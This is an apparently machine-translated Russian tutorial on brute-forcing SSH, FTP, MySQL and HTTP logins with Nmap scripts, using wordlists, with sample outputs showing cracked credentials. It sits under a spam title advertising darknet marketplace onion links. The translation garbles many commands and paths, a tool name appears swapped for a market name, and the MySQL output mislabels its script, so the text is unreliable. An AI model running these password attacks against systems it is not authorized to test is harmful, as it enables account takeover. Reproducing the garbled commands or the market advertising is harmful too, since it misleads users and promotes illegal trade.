Сайт вместо гидры омг - Официальный сайт матанга ссылка онион matangapchela com
Для перебора онлайн-сервисов люди обычно используют omg, Medusa и Metasploit Framework, но Nmap также можно использовать для перебора множества онлайн-сервисов. Существуют встроенные сценарии Nmap, которые поддерживают FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP и другие различные службы. Вы также можете использовать грубую силу HTTP-аутентификации на основе форм, базовую и дайджест-аутентификацию. Если у вас установлен Nmap, вы можете увидеть эти сценарии в каталоге «/ usr / share / nmap / scripts».[электронная почта защищена]:~$ судо подходящее обновление &&судо подходящее обновление
[электронная почта защищена]:~$ судо подходящий установитьnmap-у
[электронная почта защищена]:~$ компакт диск/usr/доля/nmap/скрипты/
[электронная почта защищена]:~$ ls*грубый*В этом руководстве мы рассмотрим, как мы можем использовать Nmap для атаки методом грубой силы.SSH Brute-ForceSSH - это безопасный протокол удаленного администрирования, поддерживающий аутентификацию на основе openssl и паролей. Для проверки подлинности на основе пароля SSH мы можем использовать сценарий Nmap «ssh-brute.nse».убунту@убунту:/usr/доля/nmap/сценарий/$ ls*ssh*грубый*
ssh-brute.nseПередайте список имен пользователей и паролей в качестве аргумента Nmap.[электронная почта защищена]:~$ nmap--скрипт ssh-брут -p22 192.168.43.181
--script-argsuserdb= users.txt,passdb= passwords.txt
Запуск Nmap 7.70( https://nmap.org ) в 2020-02-08 17: 09 ПКТ
Отчет о сканировании Nmap для 192.168.43.181
Хост включен (Задержка 0,00033 с).
ПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА
22/tcp open ssh
| ssh-брут:
| Счета:
| admin: p4ssw0rd - Действительные учетные данные
|_ Статистика: выполнено 99 догадки в60 секунд, среднее tps: 1.7
Nmap сделано: 1 айпи адрес (1 принимать) сканированный в60.17 секундыFTP грубая силаFTP - это протокол передачи файлов, который поддерживает аутентификацию на основе пароля. Для перебора FTP мы воспользуемся сценарием Nmap ftp-brute.nse.убунту@убунту:/usr/доля/nmap/сценарий/$ ls*ftp*грубый*
ftp-brute.nseПередайте список имен пользователей и паролей в качестве аргумента Nmap.[электронная почта защищена]:~$ nmap--скрипт ftp-брут -p21 192.168.43.181 --script-args
userdb= users.txt,passdb= passwords.txt
Запуск Nmap 7.70( https://nmap.org ) в 2020-02-08 16:51 ПКТ
Отчет о сканировании Nmap для 192.168.43.181
Хост включен (Задержка 0,00021 с).
ПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА
21/tcp open ftp
| ftp-brute:
| Счета:
| admin: p4ssw0rd - Действительные учетные данные
|_ Статистика: выполнено 99 догадки в20 секунд, среднее tps: 5.0
Nmap сделано: 1 айпи адрес (1 принимать) сканированный в19.50 секундыБрутфорс MYSQLИногда MySQL остается открытым для внешних подключений и позволяет любому подключиться к нему. Его пароль можно взломать с помощью Nmap с помощью скрипта mysql-brute.[электронная почта защищена]:~$ судоnmap--скрипт mysql-брут -p3306 192.168.43.181
--script-argsuserdb= users.txt, passdb= passwords.txt
Запуск Nmap 7.70( https://nmap.org ) в 2020-02-08 16:51 ПКТ
Отчет о сканировании Nmap для 192.168.43.181
Хост включен (Задержка 0,00021 с).
ПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА
3306/tcp открыть mysql
| ftp-brute:
| Счета:
| admin: p4ssw0rd - Действительные учетные данные
|_ Статистика: выполнено 99 догадки в20 секунд, среднее tps: 5.0
Nmap сделано: 1 айпи адрес (1 принимать) сканированный в19.40 секундыHTTP-брутфорсHTTP использует три типа аутентификации для аутентификации пользователей на веб-серверах. Эти методологии используются в маршрутизаторах, модемах и расширенных веб-приложениях для обмена именами пользователей и паролями. Вот эти типы:Базовая проверка подлинностиВ протоколе базовой аутентификации HTTP браузер кодирует имя пользователя и пароль с помощью base64 и отправляет их под заголовком «Авторизация». Вы можете увидеть это на следующем снимке экрана.Авторизация: Базовая YWRtaW46YWRtaW4 =Вы можете base64 декодировать эту строку, чтобы увидеть имя пользователя и пароль[электронная почта защищена]:~$ эхоYWRtaW46YWRtaW4= | base64 -d
админ: админБазовая аутентификация HTTP небезопасна, потому что она отправляет имя пользователя и пароль в виде обычного текста. Любой злоумышленник может легко перехватить трафик и расшифровать строку, чтобы получить пароль.Дайджест-аутентификацияHTTP Digest Authentication использует методы хеширования для шифрования имени пользователя и пароля перед их отправкой на сервер.Hash1 = MD5(имя пользователя: область: пароль)
Hash2= MD5(метод: digestURI)
отклик= MD5(Hash1: nonce: nonceCount: cnonce: qop: Hash2)Вы можете увидеть эти значения под заголовком «Авторизация».Аутентификация на основе дайджеста безопасна, поскольку пароль не отправляется в виде обычного текста. Если злоумышленник перехватит трафик, он не сможет получить пароль в виде простого текста.Аутентификация на основе формБазовая и дайджест-аутентификация поддерживает только передачу имени пользователя и пароля, в то время как аутентификация на основе форм может быть настроена в зависимости от потребностей пользователя. Вы можете создать свою собственную веб-страницу в HTML или JavaScript, чтобы применить свои собственные методы кодирования и передачи.Обычно данные при проверке подлинности на основе форм отправляются в виде обычного текста. По вопросам безопасности необходимо применять протоколы HTTP для предотвращения атак Man-in-the-Middle.Мы можем перебрать все типы HTTP-аутентификации с помощью Nmap. Для этого воспользуемся скриптом http-brute.убунту@убунту:/usr/доля/nmap/сценарий/$ ls*http*грубый*
http-brute.nseЧтобы протестировать этот скрипт Nmap, мы решим публично размещенную задачу грубой силы академией пентестеров по этому URL-адресу. http://pentesteracademylab.appspot.com/lab/webapp/basicauth.Нам нужно предоставить все, включая имя хоста, URI, метод запроса и словари, отдельно в качестве аргумента сценария.[электронная почта защищена]:~$ судоnmap-p80--скрипт http-brute pentesteracademylab.appspot.com
--script-args http-brute.hostname = pentesteracademylab.appspot.com,
http-brute.path =/лаборатория/веб-приложение/базикаут userdb= users.txt, passdb= passwords.txt,
http-brute.method = ОПУБЛИКОВАТЬЗапуск Nmap 7.70( https://nmap.org ) в 2020-02-08 21:37 ПКТ
Отчет о сканировании Nmap для pentesteracademylab.appspot.com (216.58.210.84)
Хост включен (Задержка 0,20 с).
Другие адреса для pentesteracademylab.appspot.com (не сканировано): 2a00:1450:4018:803::2014
запись rDNS для 216.58.210.84: mct01s06-in-f84.1e100.netПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА
80/tcp открыть http
| http-брут:
| Счета:
| admin: aaddd - Действительные учетные данные
|_ Статистика: выполнено 165 догадки в29 секунд, среднее tps: 5.3
Nmap сделано: 1 айпи адрес (1 принимать) сканированный в31.22 секундыВыводNmap можно использовать для множества вещей, несмотря на простое сканирование портов. Он может заменить Metasploit, omg, Medusa и множество других инструментов, созданных специально для онлайн-брутфорса. Nmap имеет простые, удобные в использовании встроенные скрипты, которые перебирают почти все службы, включая HTTP, TELNEL, SSH, MySQL, Samba и другие.